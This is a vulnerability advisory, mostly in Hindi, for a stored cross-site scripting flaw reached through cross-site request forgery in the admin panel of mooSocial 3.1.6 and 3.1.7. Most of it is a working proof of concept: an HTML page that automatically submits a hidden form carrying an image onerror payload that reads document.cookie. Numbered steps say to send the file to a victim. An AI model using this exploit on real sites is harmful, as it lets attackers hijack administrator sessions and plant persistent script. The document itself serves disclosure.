
mooSocial mooSocial Software v.3.1.6 में क्रॉस साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को edit_menu, copuon, और group_categorias फ़ंक्शंस में क्राफ्टेड स्क्रिप्ट के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।
mooSocial mooSocial Software v.3.1.6 और 3.1.7 में क्रॉस-साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को edit_menu, copuon, और group_categorias फ़ंक्शंस में तैयार स्क्रिप्ट के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।
CSRF के माध्यम से संग्रहीत XSS।
#प्रभावित पथ http://admin-socialcommerce.moosocial.com/admin/group/group_categories http://admin-socialcommerce.moosocial.com/admin/coupon/ http://admin-socialcommerce.moosocial.com/admin/menu/manage/edit_menu/6
Poc:
1 - इस HTML के साथ एक फ़ाइल बनाएं और XSS PAYLOAD शामिल करें
<html>
<body>
<form action="http://admin-socialcommerce.moosocial.com/admin/group/group_categories/save" method="POST">
<input type="hidden" name="data[id]" value="" />
<input type="hidden" name="data[name]" value="test"><img src=a onerror=alert(document.cookie)>test" /> ##payload in this example and encoded : test">test
<input type="hidden" name="data[type]" value="Group" />
<input type="hidden" name="data[header]" value="0" />
<input type="hidden" name="data[header]" value="1" />
<input type="hidden" name="data[parent_id]" value="0" />
<input type="hidden" name="data[description]" value="" />
<input type="hidden" name="data[active]" value="0" />
<input type="hidden" name="data[active]" value="1" />
<input type="hidden" name="data[everyone]" value="0" />
<input type="hidden" name="data[everyone]" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2 - उदाहरण test.html 3 - पीड़ित को भेजें 4 - जब पीड़ित HTML खोलता है, तो test.html फ़ाइल उसके ब्राउज़र में खुलेगी और जब वह खोलकर क्लिक करेगा, तो कोड एक पेलोड इंजेक्ट करेगा और डेटाबेस में स्टोर हो जाएगा।